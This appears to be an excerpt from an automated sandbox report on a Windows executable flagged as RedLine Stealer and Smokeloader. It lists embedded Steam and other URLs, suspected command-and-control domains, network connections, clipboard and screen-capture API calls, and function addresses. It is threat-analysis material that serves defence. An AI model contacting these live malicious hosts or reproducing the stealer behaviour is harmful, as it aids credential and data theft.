                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/apiho
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313531864.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313531864.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/apisV
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/apizo
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.0000000000796000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.0000000000797000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.cc
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.0000000000775000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313987284.0000000000811000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252043766.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/apij
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: N1sb7Ii2YD.exe, 00000000.00000003.2252135707.0000000000808000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251908717.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313794832.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, N1sb7Ii2YD.exe, 00000000.00000003.2251930691.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.6:49716 version: TLS 1.2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00431839

                  System Summary

                  barindex
                  Source: 00000000.00000002.2313213319.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0040B44C0_2_0040B44C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004087900_2_00408790
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004260540_2_00426054
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043B0680_2_0043B068
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004140700_2_00414070
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043C0200_2_0043C020
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004398300_2_00439830
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043D8300_2_0043D830
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041B0E10_2_0041B0E1
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041F0E00_2_0041F0E0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004210E00_2_004210E0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004358900_2_00435890
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004340980_2_00434098
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043D0A00_2_0043D0A0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004180A90_2_004180A9
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0040A9400_2_0040A940
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041714B0_2_0041714B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0040C9170_2_0040C917
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042B12C0_2_0042B12C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042F1300_2_0042F130
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042B1C00_2_0042B1C0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041D9E00_2_0041D9E0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004361E00_2_004361E0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004111E50_2_004111E5
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004059F00_2_004059F0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004239F20_2_004239F2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043C1F00_2_0043C1F0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0040F9FD0_2_0040F9FD
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004259900_2_00425990
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043B9A10_2_0043B9A1
